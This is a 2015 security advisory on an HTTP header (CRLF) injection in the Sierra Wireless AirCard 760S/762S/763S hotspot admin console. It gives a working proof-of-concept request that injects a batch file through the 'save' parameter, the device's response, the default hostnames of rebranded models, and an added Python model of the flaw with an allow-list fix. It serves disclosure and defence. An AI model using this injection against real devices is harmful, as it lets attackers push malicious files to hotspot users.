Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
Posted Jan 14, 2015
Authored by Luke Walker

Sierra Wireless produces a mobile wi-fi hotspot device that is popular amongst telecommunication companies for re-branding to suit local markets. The AirCard 760S/762S/763S Web-based Administrative Console suffers from an HTTP header injection that allows an attacker to inject a file into the HTTP response from the device.

tags | exploit, web, local, file inclusion
SHA-256 | ded2a0627c3a429a64de38ac35a2932ed3eba1561ee7e5b46f1a77886f913fdd

[*] Overview

Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.

The AirCard 760S/762S/763S Web-based Administrative Console suffers from an
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.

[*] Description

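The configuration export function allows the name of the exported
configuration file to be customised through the "save" parameter, but the
value is not filtered: CR/LF sequences in it are copied into the
Content-Disposition header of the response.

http://<routerURL>/export.cfg?save=export.cfg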


[*] Traffic sample from POC

(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)

> GET /export.cfg?save=export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a&sessionId=00000001%2DhYL4H4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1
> User-Agent: curl/7.40.0
> Host: router.4g
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: httpd/2.7 (sierra; D4C)
< Date: Mon, 12 Jan 2015 05:32:38 GMT
< Connection: keep-alive
< Cache-Control: no-cache
< Content-Disposition: attachment; filename=export.bat
< Content-type: application/bat
<
pause

Content-type: application/octet-stream
Transfer-encoding: chunked
3a
#
# Configuration export from Telstra WI-FI 4G
#
# Model:
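
The header handling behind the sample above, modelled as an added example
(not code from the advisory or from the device firmware), next to an
allow-list check that refuses the request. The function names, the
allow-list pattern, the response body and the session id placeholder are
assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target from the traffic sample above; the session id is replaced
# by a placeholder because it plays no part in the header handling.
POC_TARGET = ("/export.cfg?save=export.bat%0d%0aContent-type:%20application/bat"
              "%0d%0a%0d%0apause%0d%0a&sessionId=PLACEHOLDER")

# Assumed allow-list for export file names (not taken from the firmware).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def save_param(target):
    """Return the URL-decoded 'save' value as the server-side handler sees it."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return query.get("save", [""])[0]


def naive_response(name):
    """Model of the flaw: the value is concatenated into the header block."""
    return ("HTTP/1.1 200 OK\r\n"
            f"Content-Disposition: attachment; filename={name}\r\n"
            "Content-type: application/octet-stream\r\n"
            "\r\n"
            "# Configuration export\r\n")  # constructed stand-in for the body


def hardened_response(name):
    """Reject the request unless the whole name matches the allow-list.

    fullmatch() is used because '$' would also match before a trailing newline.
    """
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("illegal export file name")
    return naive_response(name)


def client_view(raw):
    """Split a raw response as a client does: headers end at the first blank line."""
    head, _, body = raw.partition("\r\n\r\n")
    fields = dict(line.split(": ", 1) for line in head.split("\r\n")[1:])
    return fields, body


if __name__ == "__main__":
    fields, body = client_view(naive_response(save_param(POC_TARGET)))
    print(fields)        # headers the client acts on
    print(repr(body))    # the device's own headers, pushed into the body
```

Rejecting the value outright is safer than stripping CR and LF, since the
file name is also what the browser offers to save.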


[*] Limitations

While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.

However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:

* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g

[*] Workaround

Change the name and IP address of the device to something other than the
default settings.

[*] Vendor Contact

An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.

regards,
Luke

